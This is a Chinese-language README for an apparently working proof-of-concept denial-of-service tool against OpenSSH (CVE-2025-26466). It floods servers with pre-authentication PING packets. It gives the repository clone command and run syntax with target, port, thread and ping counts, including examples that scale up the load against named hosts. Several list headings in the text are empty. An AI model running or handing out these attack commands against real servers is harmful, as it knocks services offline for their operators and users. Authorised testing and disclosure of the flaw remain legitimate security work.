免责声明: 此代码仅供教学目的和授权安全测试使用。未经授权攻击他人系统属于违法行为。
CVE-2025-26466 是 OpenSSH 中的一个预认证拒绝服务(DoS)漏洞,可在密钥交换完成前使 SSH 服务器过载。
服务器在初始握手期间就接受 SSH2_MSG_PING 数据包(消息类型 192),而无需存在已认证的连接。这会导致:
# 克隆仓库
git clone https://github.com/acidboonrs/cve-2025-26466-openssh-poc.git
cd cve-2025-26466-openssh-poc
# 授予执行权限(可选)
chmod +x poc.py
无需额外依赖(仅需标准库)。
python3 poc.py 192.168.1.10
python3 poc.py <目标主机> [端口] [线程数] [ping次数]
参数:
<目标主机> - 目标 IP 或主机名(必填)[端口] - SSH 端口(默认:22)[线程数] - 并行连接数(默认:10)[ping次数] - 每个连接的 PING 数(默认:500)# 默认:localhost,端口 22,10 个线程,500 个 PING
python3 poc.py localhost
# 增加负载:50 个线程,1000 个 PING
python3 poc.py 192.168.1.10 22 50 1000
# 自定义端口
python3 poc.py example.com 2222 20 800
MIT 许可证 - 详情请参阅 LICENSE
发布此 PoC 的原因在于:
仅可在以下情况下使用此代码:
未经授权的 DoS 攻击将受到法律追究!
作者: Vollassiliz (voidcall.dev)
创建日期: 2025-01-29